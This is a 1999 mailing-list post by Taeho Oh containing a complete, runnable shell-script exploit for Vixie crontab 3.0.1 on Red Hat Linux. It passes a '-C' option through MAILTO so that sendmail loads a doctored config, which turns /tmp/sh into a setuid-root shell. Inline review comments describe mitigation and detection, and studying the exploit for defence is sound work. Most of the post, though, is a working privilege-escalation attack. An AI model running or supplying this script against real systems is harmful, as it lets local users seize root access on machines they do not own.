Vixie Crontab exploit code

From: Taeho Oh (ohharaat_private)
Date: Wed Sep 01 1999 - 08:48:29 PDT


     Vixie Crontab exploit code
    
    begin vixie-ex
    ----------------------------------------------------------------------
    #!/bin/sh
    
    
    # Vixie crontab exploit
    #
    # Local user can gain root access.
    #
    # Tested redhat linux : 4.2, 5.0, 5.1, 6.0
    # Tested vixie crontab version : 3.0.1
    #
    # This program is for demonstrative use only.
    # USE IT AT YOUR OWN RISK!
    #
    # Programmed by Taeho Oh 1999/08/31
    #
    # Taeho Oh ( ohharaat_private )                   http://postech.edu/~ohhara
    # PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus
    # PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug
    #
    # Review notes (defensive summary of what this script demonstrates):
    #   The weakness is in cron, not in sendmail: the MAILTO value from a
    #   user's crontab is placed on the sendmail command line without
    #   validation, so a value beginning with "-C" makes sendmail read a
    #   configuration file of the user's choosing.  The steps below build
    #   such a file from a copy of /etc/sendmail.cf, change the delivery
    #   user to 0:0 and point the procmail mailer at a script that turns
    #   /tmp/sh into a setuid-root binary.
    #   Mitigation: use a cron that validates MAILTO (rejects a leading
    #   "-" and shell metacharacters) and passes the address as a fixed
    #   argument to sendmail; keep cron and sendmail at patched versions.
    #   Detection: user crontabs whose MAILTO starts with "-", copies of
    #   sendmail.cf and new setuid-root binaries appearing under /tmp,
    #   and the crontab replace events cron normally logs via syslog.
    
    
    # Fixed PATH so the tools used below do not depend on the caller's
    # environment.
    PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
    export PATH
    
    
    # Banner only; nothing below depends on it.
    echo
    echo "Taeho Oh ( ohharaat_private )                   http://postech.edu/~ohhara"
    echo "PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus"
    echo "PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug"
    echo
    
    
    # Step 1: a small C program that switches to uid/gid 0 and execs
    # /bin/sh.  On its own it is inert; it only becomes a root shell once
    # /tmp/makesh (step 2) has made it owned by root with the setuid bit.
    # The here-document is unquoted, but the C source contains no "$" or
    # backticks, so nothing is expanded by the shell.
    echo make shell
    echo
    cat > /tmp/sh.c << EOF
    #include<unistd.h>
    #include<stdlib.h>
    int main()
    {
    	setuid(0);
    	setgid(0);
    	execl("/bin/sh","sh",0);
    	return 0;
    }
    EOF
    echo compile shell
    echo
    # Try cc first, fall back to gcc if cc is absent or fails.
    cc -o /tmp/sh /tmp/sh.c || gcc -o /tmp/sh /tmp/sh.c
    
    
    # Step 2: the script that the modified sendmail.cf substitutes for
    # procmail.  When sendmail runs it during local delivery it changes
    # the owner/group of /tmp/sh to root and sets mode 4755 (setuid root).
    echo make execute shell script
    echo
    cat > /tmp/makesh << EOF
    #!/bin/sh
    chown root /tmp/sh
    chgrp root /tmp/sh
    chmod 4755 /tmp/sh
    EOF
    chmod 755 /tmp/makesh
    
    
    # Step 3: build a user-controlled sendmail configuration from a copy of
    # the system one.  The three sed passes rewrite the DefaultUser option
    # to 0:0, replace the procmail mailer program path with /tmp/makesh and
    # rename its argv[0] accordingly; the result of the last pass (tmp3) is
    # what ends up in /tmp/sendmail.cf, and the intermediates are removed.
    # Note that the replaced literals (8:12, /usr/bin/procmail) are what the
    # tested Red Hat releases shipped; the substitutions are no-ops on a
    # sendmail.cf that differs.
    echo hack sendmail.cf
    echo
    cp -f /etc/sendmail.cf /tmp/sendmail.cf.tmp1
    sed 's/O DefaultUser=8:12/O DefaultUser=0:0/g' /tmp/sendmail.cf.tmp1 > /tmp/sendmail.cf
    sed 's/P=\/usr\/bin\/procmail/P=\/tmp\/makesh/g' /tmp/sendmail.cf.tmp1 > /tmp/sendmail.cf.tmp2
    sed 's/A=procmail/A=makesh/g' /tmp/sendmail.cf.tmp2 > /tmp/sendmail.cf.tmp3
    cp /tmp/sendmail.cf.tmp3 /tmp/sendmail.cf
    rm -f /tmp/sendmail.cf.tmp1
    rm -f /tmp/sendmail.cf.tmp2
    rm -f /tmp/sendmail.cf.tmp3
    
    
    # Step 4: the crontab that triggers the bug.  MAILTO is set to
    # "-C/tmp/sendmail.cf <user>"; the backticks are expanded by *this*
    # script (unquoted here-document), so the current user name is written
    # into the file.  The "* * * * *" job produces output every minute,
    # which makes cron invoke sendmail to mail it, handing sendmail the
    # attacker-supplied -C option unvalidated.
    echo make cron file
    echo
    cat > /tmp/cronfile << EOF
    MAILTO=-C/tmp/sendmail.cf `whoami`
    * * * * * ls
    EOF
    echo input cron file
    echo
    # Installs the crontab for the invoking user (a replace event cron
    # normally logs).
    crontab /tmp/cronfile
    
    
    # Step 5: sleep until roughly five seconds past the next minute
    # boundary (65 - current seconds), i.e. until the once-a-minute job has
    # had a chance to fire.
    echo wait for 1 minute
    echo
    sec=`date +%S`
    wait=`expr 65 - $sec`
    sleep $wait
    
    
    # Step 6: if step 2 ran as root, /tmp/sh is now setuid root and this
    # gives a root shell; otherwise it is just a shell as the current user.
    echo execute shell
    echo
    /tmp/sh
    
    
    # Step 7: cleanup after the shell exits.  /tmp/sh itself is NOT removed
    # here, so a setuid-root binary is left behind in /tmp -- an artifact
    # responders should look for.  "crontab /dev/null" empties the user's
    # crontab (also a logged replace event).
    echo delete data files
    echo
    cd /tmp
    rm -f sendmail.cf cronfile makesh sh.c
    crontab /dev/null
    ----------------------------------------------------------------------
    end vixie-ex
    
    --
    
    Taeho Oh ( ohharaat_private )                   http://postech.edu/~ohhara
    PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus
    PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug
    


